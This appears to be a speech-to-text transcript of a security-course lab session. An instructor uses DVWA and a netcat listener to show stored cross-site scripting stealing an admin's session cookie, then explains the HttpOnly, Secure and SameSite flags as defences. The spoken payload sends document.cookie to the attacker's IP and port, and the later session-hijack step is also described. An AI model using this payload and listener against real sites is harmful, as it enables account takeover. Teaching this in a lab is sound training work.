1 2 3 4 5 6 7. Okay, 15, 20. I'll give you another 5 minutes. Try to finish that. Then other members try to practice the cross-site script vulnerability. How many of you remember stored cross-site script? Stored cross-site script in DVWA. Launch Firefox. Try to inject one script alert. Okay, and then DVWA admin as admin, password as password. So now log in as a different user. Instead of admin, Gordon B, Gordon B, and the usernames are ABC123 is the password. ABC123. I'm trying to log in as a non-admin user for this scenario. Set the security to low, and we have cross-site script stored. Okay, already some alerts are coming up. I want to clean up all the previous scripts or anything. You can go to the setup, click on create or reset database. Now go to the stored. Try to inject one simple Java alert script and iframe and confirm me. Everyone try to do this one more time. Okay, last 2 minutes. So far, whatever you guys are doing, is that only vulnerability or exploitation? Is that only vulnerability or exploitation? That is only the vulnerability. We didn't exploit that target for any kind of purpose. In today's session, I'm going to exploit the target for gaining the session ID. Earlier, you'd have got one doubt, no? As a non-admin, I am trying to. Sorry guys. I logged into this application. So I logged in as what is the user? Gordon B ABC123. Okay, Gordon B is one of the user. Now, if I want this one to have the admin access, I want to steal the cookie. Am I correct? Inspect element, network, then click on something. What are the cookies? Two cookies are there, PHP session ID and security. PHP session ID for admin, it will be different. So how do you get the session ID of the admin? Earlier I took like, okay, assuming like you have got it, then you have to do, or you have to override the PHP session ID. But how do you get it? So we get it by making use of this cross-site script vulnerability. So how to do that? Assume like, okay, you need one more system. Along with the third system, I'm going to turn it on. Think like Kali Linux is used by the attacker and Windows 7 system is used by the victim, who is nothing but what is administrator. Okay. I'll prepare a payload in such a way that the moment user launches this page, I should be able to read the cookie. For that, I'm going to make use of a tool called netcat. Remember the tool name, netcat. You need to launch terminal like this. Just like other tools, you just need to type netcat. Okay. Netcat. That's it. If you want to know some parameters, double hyphen help. In case if you forget the commands, you need to make use of this. Or hyphen h hyphen h. It will list you the options. However, for easy way of remembering, think like what is the purpose of the netcat tool? The purpose of netcat tool is it will be continuously listening through some port number. Okay. So hyphen n node ns and L for listening mode. You can see that the specific parameters what I am trying to pass it. They have mentioned some examples, right? NC hyphen L hyphen P like that. K, keep socket alive. Hyphen L. L is for listening mode. Okay. And what is the port number if you want to listen? Hyphen P. That's what I'm trying to do. Hyphen LL, NL, and port number, verbose locking. Then K. Mention the port number. What is the port number you want to listen? Any port number you can give. Enter. Invalid local port. P. Okay. P, try to keep it at the end. So I'm continuously listening through the port 6677. What is the IP address of my Kali Linux? Type it in other tab to find out the IP address. My IP address is 192.168.154.128, right? 128. And port number which I am listening is 6677. Remember, port number, IP address colon port number. That specific convention is called socket. Socket means you are trying to listen through some port number. 192.168.154.128. How do I access this socket? Let us go to the Windows 7 system. Welcome. Welcome 123, right? Okay. Netcat, very interesting tool. One 192.168.154.130. 130 or what is IP address? 128. 128 colon. If I try to access with some port number, what is the port number I'm trying to listen? 6677. So I try to view 6688 instead of 7788. I put enter. So there is nothing like something listening in this port number 6688 of this system. So you don't get any trace. But what in case if you try to access 6677, 6677 and enter. See if there is. We are trying to listen in that port number. The moment I access that, it is able to list some details from the victim system. It says 128. Okay, 128, 168. No, 168 is the IP address, right? 168 is the IP address of Windows 7 system, and I am able to get the details. Try it out one more time. Now the session is not running. Okay. So basically, if you want to listen through some port number, we use Netcat tool. Okay, why should I use this tool? I'm going to create a payload which can read cookie if someone stored process script is there. I'm going to make use of this vulnerability to steal the cookie through online. Okay, I want to steal the cookie of the admin. How do I do that? Prepare the payload first. Open the editor, text editor. Now, script. Do you guys remember script tag? Okay. And document dot location is equal to http colon one 192.168 dot what is the IP address 154.130 colon. I want to listen through some port number 6655 / question mark plus document dot cookie. So what is this going to do it? This specific payload is going to read the cookie from any system who can launch the vulnerable process script page. For that, I need to run or listen through this port number 6655. Okay. Instead of 130, 128. Listening host. 128 is my carrier IP, right? Try to view this payload. Copy. Very important payload. They will ask you like, how do you exploit cross-site script vulnerability? Document.location is equal to so and so, and then document.cookie. Let me see if we can read, if we can get the cookie from this. So I want to read the cookie of the admin. Right click, inspect, and we know like we have to overwrite the length. Any length you can put. Now copy paste the payload. Script closing track, then document.location, then document.cookie. Sign guest. Okay, fine, that's okay. The moment you inject, there is no service running in this. That is the reason we get this invalid page. Scroll back. Don't go to that page now. That page is injected with a payload where the socket is running. Now go to the terminal. 6655, right? That's it. I am trying to listen through 6655. Go to the Windows 7 system. I want to log into DVW application as an admin user now. So here, Kali Linux, I logged in as non-admin. And here I'm trying to, in case of Windows 7, I'm trying to log in as an admin user. Okay, fine. And ensure DVW security is set to low. The payload is injected in the stored process script. As and then I access any other pages, that's okay. I don't see any kind of details from any of the systems, right? So what in case like, I don't know, some of the user has injected the process script under stored, process script stored. The moment I access that page, then the cookie, what is the cookie of the admin? Inspect. The cookie from this system will be sent to the attacker system. Cookies. Where is the other cookie? Application cookies. So PHP session ID as a cookies E6F. Okay, it starts with E6. Now go back to the Kali Linux, not Kali Linux, Windows 7 system. I have used 6655. Remember, okay? I don't know, like some user has injected stored process script. Then try to access that page. I'm able to access the page. Go back to the Kali Linux. See, the moment I access, I'm able to read the cookie. Did I get the cookie? PHP session ID of the admin user. The admin has logged into this one, and this is the PHP session ID. In Kali Linux, I am able to see the PHP session ID of the admin user E6. Copy selection. You can just check that E6. What next? Yesterday's lab, what did we do? We have to install the cookie editor, then override the cookie so that garden B will become admin user. Okay, understood? I'll give you the script. Everyone try to do the same thing. You need three systems. Windows 7 system is required. Metasploit is required. This payload is very important. Ten minutes to go. Try it out, everyone. Okay. Instead of image or iframe, you need to inject the script, but that script should read the cookie. We are able to access the cookie. With the help of that cookie, again I can access any other user session. It is not like only one user. If some other user also logs in, we'll get the cookie of that user. Yesterday's videos are already uploaded. Today's, yes, we are going to do it soon. Try it out. 10 minutes to go. Netcat command, right? Okay. -n lvkp. Any port number you can give. Windows password. Windows password is set by you, right? When you configured your Windows system, you would have set welcome, welcome 123. It all depends on how you have configured your Windows 7 password. Last 5 minutes. Confirm me once you are done with it. Last 2 minutes. How many of you are done with it? You guys need more time. You need to know how to run netcat tool. Then the script for reading the cookie. You need to inject that. These practicals will not be asked in the interviews. You just need to know the payloads. Netcat, how to use it, and what is the payload I have used for stealing the cookie. Don't worry if you are able to get the cookie or not in the real time. Okay, fair enough. We have got another 10 minutes. I'm going to explain some important interview questions and answers based on this lab. So go back to Kali Linux. right click, inspect the page, and go to the applications tab or network, click on network. You see the cookies. There are two cookies, right? PHP session ID is there. Okay, where is the applications tab? Okay, under storage we have the cookies. PHP session ID is there and security also there. Okay, whatever the attributes you see on the right hand side, PHP session ID, HTTP only is set to false. Then secure flag, where do you see secure somewhere? Secure is also set to false. In ideal cases, for the cookie to be protected, remember these two flags has to be true, secure flag and HTTP only. What is the significance of HTTP only? The significance of HTTP only is if you set this one to true, we cannot steal the cookie by using any kind of external scripts. So right now attacker is able to steal the cookie just because this flag is set to false. If this flag is set to true, it is not possible for the attacker to read the cookie by using any of the scripts. So document.cookie will not work in case if this is set to true. Understood? I am able to do the exploitation for stealing the cookie just because this flag is set to false. Similarly, secure flag is there. Remember the significance of secure flag is it will ensure that cookie gets communicated only through HTTPS. Right now, I am able to establish the session in HTTP. I am able to communicate. If this is set to true, I cannot access the application in HTTP, or I can access the application, but cookie will not be helpful to communicate with the server. These are the two important flags that are required for you to know how you can protect the cookie. Okay, HTTP only and secure flag. One more flag, same site is there. Remember the ideal value for same site is strict, which means that cookies will not be shared to the external domains if this is set to strict. So the ideal values are strict and lax, but you can make it as a strict. These are the three flags which I want everyone to remember that. Okay. Can all of you check for ultramutual.com J session ID or the session ID value? What are the secure? What are the cookie flags that are enabled? Check the flags for secure HTTP only on same site. I want to know the details of those flags for not DVWA for ultramutual.com. Can you try now? Tell me the flags, cookie flags. Done. Ultramutual.com, right click, inspect, network. Tomorrow we are going to discuss CSRF, SSRF, and then network security basics. Storage, JSession ID. HTTP only is set to true. Okay. Secure flag, false. So what are the cookie attributes do you check when you get an application? Remember, secure, HTTP only, and same site. Okay, fair enough. That's all for today. Can we, when you come up for tomorrow's session, try to read CSRF and SSRF. CSRF is there. Don't do anything here. Maybe check in the online like CSRF versus SSRF. Client side request forgery, server side request forgery, and come for tomorrow's session. We'll close this CSRF and SSRF issues tomorrow. And also we'll start network security basics. Okay guys, thank you so much. We are left with 1 minute. We'll catch up tomorrow then. Okay. Practice the lab. Don't spend much time for cross-site script. Stealing the cookie using the stored cross-site script. If you're able to do it, do. If you're not able to do it, just try to understand the concepts. That's it. We'll have the quiz on tomorrow, not today. Okay. Bye.